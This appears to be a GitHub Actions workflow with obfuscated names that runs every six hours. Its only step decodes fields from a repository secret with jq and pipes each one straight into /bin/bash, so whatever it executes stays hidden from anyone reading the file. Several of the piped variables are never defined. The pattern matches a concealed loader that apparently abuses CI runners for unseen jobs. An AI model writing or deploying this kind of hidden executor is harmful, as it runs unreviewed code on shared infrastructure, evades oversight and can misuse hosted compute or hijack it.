name: sumiaoling7654

on:
  workflow_dispatch:
  schedule:
    - cron: '56 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sumiaoling7654
        env:
          u518: ${{ secrets.u518 }}
        run: |
          echo $u518 | jq -r .qszwg923 | /bin/bash
          echo $l3802 | jq -r .pwcj2 | /bin/bash
          echo $bs4 | jq -r .st09946 | /bin/bash
          echo $iun172 | jq -r .jbrce09194 | /bin/bash
          echo $ighp09 | jq -r .tcq428 | /bin/bash
          echo $xz85777 | jq -r .geavv81 | /bin/bash
          echo $riia5966 | jq -r .ddl111 | /bin/bash
          echo $js082 | jq -r .bjehw425 | /bin/bash
          echo $xn313 | jq -r .nnr39 | /bin/bash

